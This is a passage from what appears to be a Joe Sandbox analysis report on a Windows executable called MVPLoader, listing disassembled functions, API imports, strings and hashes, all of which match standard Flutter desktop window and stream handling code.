                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: __acrt_iob_func$_dup2_filenofreopen_s$?sync_with_stdio@ios_base@std@@AllocConsoleDesktopFlutterOutputResyncStreams
                                                  • String ID: CONOUT$
                                                  • API String ID: 396801638-3130406586
                                                  • Opcode ID: f118a68f80fba26191b39fc65b3ebc6219501ab17b230a5cf0f8945e069e041f
                                                  • Instruction ID: 03183213762f69e2d0619e535fbfc44c50d96048eb14d55f5e367b4308d0dc22
                                                  • Opcode Fuzzy Hash: f118a68f80fba26191b39fc65b3ebc6219501ab17b230a5cf0f8945e069e041f
                                                  • Instruction Fuzzy Hash: 8B11A828A48A43D6EB447B65E838ABAA3A1EF44B55FC00075C50E433A3DF6CB589C371
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605BB0F0 Relevance: 21.5, APIs: 9, Strings: 3, Instructions: 454COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B36F3
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3708
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B371D
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B373D
                                                    • Part of subcall function 00007FF7605B36B0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B375C
                                                    • Part of subcall function 00007FF7605B36B0: ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3770
                                                    • Part of subcall function 00007FF7605B36B0: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3783
                                                    • Part of subcall function 00007FF7605B36B0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3793
                                                    • Part of subcall function 00007FF7605B36B0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38AC
                                                    • Part of subcall function 00007FF7605B36B0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38B6
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38C7
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB170
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB1E8
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB25E
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB2D9
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605BB3BD
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605BB417
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605BB48A
                                                    • Part of subcall function 00007FF7605B36B0: ?flags@ios_base@std@@QEBAHXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37BA
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37DA
                                                    • Part of subcall function 00007FF7605B36B0: ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37ED
                                                    • Part of subcall function 00007FF7605B36B0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37F9
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3816
                                                    • Part of subcall function 00007FF7605B36B0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3825
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B384A
                                                    • Part of subcall function 00007FF7605B36B0: ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B385D
                                                    • Part of subcall function 00007FF7605B36B0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3869
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEAA_J_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3896
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB4FB
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB783
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@D@std@@@2@V01@@$?rdbuf@?$basic_ios@V?$basic_streambuf@$?width@ios_base@std@@$_invalid_parameter_noinfo_noreturn$?fill@?$basic_ios@?good@ios_base@std@@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?tie@?$basic_ios@Osfx@?$basic_ostream@V12@V?$basic_ostream@
                                                  • String ID: 8$Invalid method call; method name is not a string.$Invalid read in StandardCodecByteStreamReader
                                                  • API String ID: 3362644652-1875019175
                                                  • Opcode ID: 858b82274841d3921d3b5099471afac36d5d179b454d2ea0f45b8ca54881f804
                                                  • Instruction ID: fd357de83b16eabb07286ac34276826760dcb28bd44883d97024b02615ba0e13
                                                  • Opcode Fuzzy Hash: 858b82274841d3921d3b5099471afac36d5d179b454d2ea0f45b8ca54881f804
                                                  • Instruction Fuzzy Hash: F212B622A08B46D5EB10EF25E4A0ABDA361FB45794F904532EA5D03B9ADFBCF544C720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B2E60 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 118registrywindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: ClassHandleLoadModuleMonitorWindow$CreateCursorDesktopDestroyFlutterFromIconPointRegisterUnregistermalloc
                                                  • String ID: FLUTTER_RUNNER_WIN32_WINDOW
                                                  • API String ID: 202201499-3066883769
                                                  • Opcode ID: 84abeec013650833e230725520de61a20853b7e9b09ba42b834cd101df5714b8
                                                  • Instruction ID: 95628ba14ec9bd5e31e3be927783c606e59127f65faed6e4bf8c2e67110803a5
                                                  • Opcode Fuzzy Hash: 84abeec013650833e230725520de61a20853b7e9b09ba42b834cd101df5714b8
                                                  • Instruction Fuzzy Hash: 5C51B336A18B81C6D711EB25F450A6AF3A4FB59B80F508235EA8E53B16EF3CF451CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B3100 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Window$ClassClientDestroyFocusMessageMovePostProcQuitRectUnregister
                                                  • String ID: FLUTTER_RUNNER_WIN32_WINDOW
                                                  • API String ID: 1375901799-3066883769
                                                  • Opcode ID: 9c649c9cbd073284af6d405f5f6c730b8bba256f1b1402533a2745904b5a5647
                                                  • Instruction ID: 01277abd2af0207955040f77b2236f19603ee7dfc975889ed990d24ebabcaaf2
                                                  • Opcode Fuzzy Hash: 9c649c9cbd073284af6d405f5f6c730b8bba256f1b1402533a2745904b5a5647
                                                  • Instruction Fuzzy Hash: 8841403AA08652C7EB64EB69E864939E760FF84B84F944135D94E53B66CF3CF841C720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B65D3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: MonitorWindow$#413AreaClientCursorExtendFrameFromInfoIntoPoint
                                                  • String ID: #$(
                                                  • API String ID: 991232836-18311415
                                                  • Opcode ID: 834f147fc7f295a2fc31e987ba63641220d60bb18e14685c497cd3b2570b0969
                                                  • Instruction ID: 55e24fb4d11ac568c934370a0d5eb7096a8c509261befabfd8f3e757e9d69fad
                                                  • Opcode Fuzzy Hash: 834f147fc7f295a2fc31e987ba63641220d60bb18e14685c497cd3b2570b0969
                                                  • Instruction Fuzzy Hash: F2318136A18752C7E710DF29A854A3AF760FBC4744F944238EA8942B55DF7CF4858F20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B1020 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 30libraryloaderthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CurrentHookLibraryLoadThreadWindows
                                                  • String ID: GetDpiForWindow$GetSystemMetricsForDpi$User32.dll
                                                  • API String ID: 3725222763-1451904415
                                                  • Opcode ID: 399307811642ed9edfd4f17f20c750e77d229c18de5923f9e3a7f8a20eea400c
                                                  • Instruction ID: 04dbf497e5b723400dd58be81c9c1639e14223add0280cd3c6096e11c0eb9bef
                                                  • Opcode Fuzzy Hash: 399307811642ed9edfd4f17f20c750e77d229c18de5923f9e3a7f8a20eea400c
                                                  • Instruction Fuzzy Hash: 3901A97994AB06C2EB04BB54E868A70B3A0BF48740FC44438C80E02362EF7CB1C8C730
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B6220 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Monitor$FromInfoWindowceil$#413Zoomed
                                                  • String ID: (
                                                  • API String ID: 1964112077-3887548279
                                                  • Opcode ID: 84698f5d985a22cc159a5522ac69392625145164d3497d0927948a72032b96b1
                                                  • Instruction ID: fb78b6bd94edb47a1d70c9621f11bc3316bc4ee5be503ec4c0e518f143d520c0
                                                  • Opcode Fuzzy Hash: 84698f5d985a22cc159a5522ac69392625145164d3497d0927948a72032b96b1
                                                  • Instruction Fuzzy Hash: 75516C76D19741DBEB14AF259660969F3A0FFA8784B40823AD74953B42EB3CF4A1CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B9A40 Relevance: 12.1, APIs: 8, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: memmove$_invalid_parameter_noinfo_noreturnmalloc
                                                  • String ID:
                                                  • API String ID: 1886930152-0
                                                  • Opcode ID: f8c63339b67035a4540b22e413aef9cae8443001fe3780622079061f9c36a7b7
                                                  • Instruction ID: 18f483beabaec21b08f807aa6bcca2f728a314a247528f893b34f9ae544b702b
                                                  • Opcode Fuzzy Hash: f8c63339b67035a4540b22e413aef9cae8443001fe3780622079061f9c36a7b7
                                                  • Instruction Fuzzy Hash: AC410322B09B85C5EC10BB66A9249B9EB84EB45FD0FA44635DE5D17B87DF3CF0419320
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B1EC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7605B1EC0: memcpy.VCRUNTIME140 ref: 00007FF7605B1D3E
                                                    • Part of subcall function 00007FF7605B1EC0: memcpy.VCRUNTIME140 ref: 00007FF7605B1D4E
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B2017
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B20E3
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B21AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                  • String ID: \app.so$\flutter_assets$\icudtl.dat
                                                  • API String ID: 3063020102-2635820779
                                                  • Opcode ID: 706a4e8c293e4db1b5d8b93a98cd19a69e8d18fc85ba348d5ed7e0e34e014eae
                                                  • Instruction ID: 46916b524eadbdce34c94349c2e36fbd7a5a31be0a6c3e902f8d531b54fb3df0
                                                  • Opcode Fuzzy Hash: 706a4e8c293e4db1b5d8b93a98cd19a69e8d18fc85ba348d5ed7e0e34e014eae
                                                  • Instruction Fuzzy Hash: 6891A262A04B81C1EA10EF28E45476DB3A1EB54B98F909631DB9C07BA6DF7DF5D0C360
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605BD6DC Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: __scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_release_startup_lock_cexit_exit_get_wide_winmain_command_line_register_thread_local_exe_atexit_callback
                                                  • String ID:
                                                  • API String ID: 2671446237-0
                                                  • Opcode ID: bfb1cc5b263228ccf1b01a407c993b066369669872a1c4ebac50bac5ccaf90a1
                                                  • Instruction ID: 2b492cbefa890bd456df95bc526324a38ac955e0d212035341495f8d9fba65fd
                                                  • Opcode Fuzzy Hash: bfb1cc5b263228ccf1b01a407c993b066369669872a1c4ebac50bac5ccaf90a1
                                                  • Instruction Fuzzy Hash: B131F125E0D642C1EA24BB689471BB9A391AF41744FD85478EA0E0B3E3FF2CB8448631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B54E0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Error: Response can be set only once. Ignoring duplicate response., xrefs: 00007FF7605B5534
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: DesktopFlutterMessenger$V01@$??6?$basic_ostream@AvailableD@std@@@std@@LockU?$char_traits@UnlockV01@@
                                                  • String ID: Error: Response can be set only once. Ignoring duplicate response.
                                                  • API String ID: 887895033-3377123316
                                                  • Opcode ID: e2e803bbc3e9bcba1f5c5f3eb275a2e46785122a8a0381872556caf083701f6c
                                                  • Instruction ID: e349cb0abb0827f667f7cdb1e3068d62b2320e3c618880d16f1a593c8cd10b81
                                                  • Opcode Fuzzy Hash: e2e803bbc3e9bcba1f5c5f3eb275a2e46785122a8a0381872556caf083701f6c
                                                  • Instruction Fuzzy Hash: 38110739A08A42D2EA14AF16F860A69A365FB89BC1F984035DE8D13766DF3CF555C320
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B7880 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memcmp.VCRUNTIME140 ref: 00007FF7605B78C9
                                                    • Part of subcall function 00007FF7605BD450: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7605B14A6), ref: 00007FF7605BD46A
                                                    • Part of subcall function 00007FF7605BD450: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7605BD480
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B7A0E
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B7A65
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskmallocmemcmp
                                                  • String ID: ILED$dragAppWindow
                                                  • API String ID: 2388763519-1034066609
                                                  • Opcode ID: b7937625da5327750bed1ccc6daafe8a5b5d7a689ab888daba2e7af49442aaea
                                                  • Instruction ID: f7afedd542630a6b01bebc4d690e78c3eee0da01b02ad75eceefe2a040469740
                                                  • Opcode Fuzzy Hash: b7937625da5327750bed1ccc6daafe8a5b5d7a689ab888daba2e7af49442aaea
                                                  • Instruction Fuzzy Hash: 6051BE32A08B86C1EB10AB24E46476EB761EBC5B94F604235EA9D077A6DF7CF584C710
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FlutterDesktopTextureRegistrarRegisterExternalTexture.FLUTTER_WINDOWS ref: 00007FF7605B4ED4
                                                  • FlutterDesktopTextureRegistrarRegisterExternalTexture.FLUTTER_WINDOWS ref: 00007FF7605B4F1B
